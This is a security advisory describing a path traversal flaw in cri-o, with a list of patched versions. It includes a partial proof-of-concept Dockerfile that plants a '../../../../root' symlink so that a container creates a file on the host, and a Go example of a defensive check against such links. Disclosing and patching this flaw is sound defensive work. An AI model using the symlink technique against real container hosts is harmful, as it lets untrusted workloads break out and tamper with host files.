Lack of data validation - Path Traversal In github.com/cri-o/cri-o
Description
A malicious container creates a symlink "mtab" on the host.
Impact
A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.
A workload built from this Dockerfile:
    FROM docker.io/library/busybox as source
    RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc
    FROM scratch
    COPY --from=source /bin /bin
    COPY --from=source /lib /lib
    COPY --from=source /extra ....
and this container config:
{ "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [...
and this sandbox config
{ "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": {...
will create a file on the host, /host/mtab.
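A defensive check against an `etc` symlink like the one the Dockerfile creates, as an added example (it is not cri-o's code and not its patch). It assumes the runtime places the link at `etc/mtab` under the container root and points it at `/proc/mounts`; `createMtab`, `demo`, `realetc` and `hostdir` are hypothetical names, and the directory layout is constructed in a temporary directory.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// createMtab links <rootfs>/etc/mtab, refusing when symlinks in the
// container-controlled tree resolve etc to a directory outside rootfs.
func createMtab(rootfs string) (string, error) {
	root, err := filepath.EvalSymlinks(rootfs)
	if err != nil {
		return "", err
	}
	etc, err := filepath.EvalSymlinks(filepath.Join(root, "etc"))
	if err != nil {
		return "", err
	}
	if etc != root && !strings.HasPrefix(etc, root+string(os.PathSeparator)) {
		return "", fmt.Errorf("etc resolves outside the rootfs: %s", etc)
	}
	link := filepath.Join(etc, "mtab")
	return link, os.Symlink("/proc/mounts", link) // assumed mtab target
}

// demo builds a constructed rootfs whose etc is a symlink to target
// (hostdir stands in for the host), then calls createMtab on it.
func demo(target string) (string, error) {
	base, err := os.MkdirTemp("", "mtab-demo")
	if err != nil {
		return "", err
	}
	defer os.RemoveAll(base)
	for _, d := range []string{"rootfs/realetc", "hostdir"} {
		if err := os.MkdirAll(filepath.Join(base, d), 0o755); err != nil {
			return "", err
		}
	}
	if err := os.Symlink(target, filepath.Join(base, "rootfs", "etc")); err != nil {
		return "", err
	}
	return createMtab(filepath.Join(base, "rootfs"))
}

func main() {
	fmt.Println(demo("realetc"))    // link stays inside rootfs: allowed
	fmt.Println(demo("../hostdir")) // climbs out like the Dockerfile's link: refused
}
```

Resolving and then creating is still racy if the container can modify the tree between the two steps, so production code should resolve relative to an already opened root directory or use a scoped-join routine.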
Patches
1.30.1, 1.29.5, 1.28.7
Workarounds
Unfortunately not
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
| Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
| go | github.com/cri-o/cri-o | | 1.28.7, 1.29.5, 1.30.1 |